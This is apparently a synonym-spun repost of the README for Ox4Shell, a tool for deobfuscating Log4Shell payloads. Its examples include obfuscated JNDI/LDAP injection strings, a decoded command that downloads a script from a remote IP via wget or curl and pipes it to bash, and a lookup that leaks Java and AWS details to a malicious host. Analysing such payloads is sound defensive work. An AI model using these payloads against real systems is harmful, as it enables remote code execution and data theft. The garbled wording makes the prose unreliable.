Deobfuscate Log4Shell payloads with ease.
Description
Because the launch of the Log4Shell vulnerability (CVE-2021-44228), many instruments have been created to obfuscate Log4Shell payloads, making the lives of safety engineers a nightmare.
This device intends to unravel the true contents of obfuscated Log4Shell payloads.
For instance, think about the next obfuscated payload:
${zrch-Q(NGyN-yLkV:-}${j${sm:Eq9QDZ8-xEv54:-ndi}${GLX-MZK13n78y:GW2pQ:-:l}${ckX:[email protected][)]Tmw:a(:-da}${W(d:KSR)ky3:bv78UX2R-5MV:-p:/}/1.${)U:W9y=N:-}${i9yX1[:Z[Ve2=IkT=Z-96:-1.1}${[W*W:[email protected]@-vL7thi26dIeB-HxjP:-.1}:38${Mh:n341x.Xl2L-8rHEeTW*=-lTNkvo:-90/}${sx3-9GTRv:-Cal}c$c${HR-ewA.mQ:[email protected]:-z}3z${uY)u:7S2)P4ihH:[email protected]:-]}${S5D4[:qXhUBruo-QMr$1Bd-.=BmV:-}${_wjS:BIY0s:-Y_}p${SBKv-d9$5:-}Wx${Im:ajtV:-}AoL${=6wx-_HRvJK:-P}W${cR.1-lt3$R6R]x7-LomGH90)gAZ:NmYJx:-}h}
After working Ox4Shell, it could rework into an intuitive and readable kind:
${jndi:ldap://1.1.1.1:3890/Calc$cz3z]Y_pWxAoLPWh}
This device additionally aids to establish and decode base64 instructions For instance, think about the next obfuscated payload:
${jndi:ldap://1.1.1.1:1389/Primary/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNTAuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA==}
After working Ox4Shell, the device reveals the attacker’s intentions:
${jndi:ldap://1.1.1.1:1389/Primary/(wget -O - http://185.250.148.157:8005/acc||curl -o - http://185.250.148.157:8005/acc)|/bin/bash
Ox4Shell with a supplied file (-f) slightly than an inline payload (-p), as a result of sure shell environments will escape essential characters, subsequently will yield inaccurate outcomes.Utilization
To run the device merely:
~/Ox4Shell » python ox4shell.py --help
utilization: ox4shell [-h] [-d] [-m MOCK] [--max-depth MAX_DEPTH] [--decode-base64] (-p PAYLOAD | -f FILE)____ _ _ _____ _ _ _
/ __ | || | / ____| | | | |
| | | |_ _| || || (___ | |__ ___| | |
| | | / /__ ____ | '_ / _ | |
| |__| |> < | | ____) | | | | __/ | |
____//_/_ |_||_____/|_| |_|___|_|_|
Ox4Shell - Deobfuscate Log4Shell payloads with ease.
Created by https://oxeye.io
Normal:
-h, --help Present this assist message and exit
-d, --debug Allow debug mode (default: False)
-m MOCK, --mock MOCK The situation of the mock knowledge JSON file that replaces sure values within the payload (default: mock.json)
--max-depth MAX_DEPTH
The ma ximum variety of iteration to carry out on a given payload (default: 150)
--decode-base64 Payloads containing base64 will likely be decoded (default: False)
Targets:
Select which goal payloads to run Ox4Shell on
-p PAYLOAD, --payload PAYLOAD
A single payload to deobfuscate, be sure to flee '$' indicators (default: None)
-f FILE, --file FILE A file containing payloads delimited by newline (default: None)
Mock Knowledge
The Log4j library has a number of distinctive lookup capabilities, which permit customers to search for atmosphere variables, runtime data on the Java course of, and so forth. This functionality grants menace actors the flexibility to probe for particular data that may uniquely establish the compromised machine they focused.
Ox4Shell makes use of the mock.json file to insert widespread values into sure lookup perform, for instance, if the payload accommodates the worth ${env:HOME}, we are able to change it with a customized mock worth.
The default set of mock knowledge supplied is:
{
"hostname": "ip-127.0.0.1",
"env": {
"aws_profile": "staging",
"consumer": "ubuntu",
"pwd": "/decide/",
"path": "/usr/native/sbin:/usr/native/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin"
},
"sys": {
"java.model": "16.0.2",
"consumer.title": "ubuntu"
},
"java": {
"model": "Java model 16.0.2",
"runtime": "OpenJDK Runtime Atmosphere (construct 1.8.0_181-b13) from Oracle Company",
"vm": "OpenJDK 64-Bit Server VM (construct 25.181-b13, combined mode)",
"os": "Linux 5.10.47-linuxkit unknown, structure: amd64-64",
"locale": "default locale: en_US, platform encoding: UTF-8",
"hw": "processors: 1, structure: amd64-64"
}
}
For instance, we are able to deobfuscate the next payload utilizing the Ox4Shell’s mocking functionality:
~/Ox4Shell >> python ox4shell.py -p "${jndi:ldap://${sys:java.model}.${env:AWS_PROFILE}.malicious.server/a}"
${jndi:ldap://16.0.2.staging.malicious.server/a}Authors
License
The supply code for the challenge is licensed underneath the MIT license, which yow will discover within the LICENSE file.
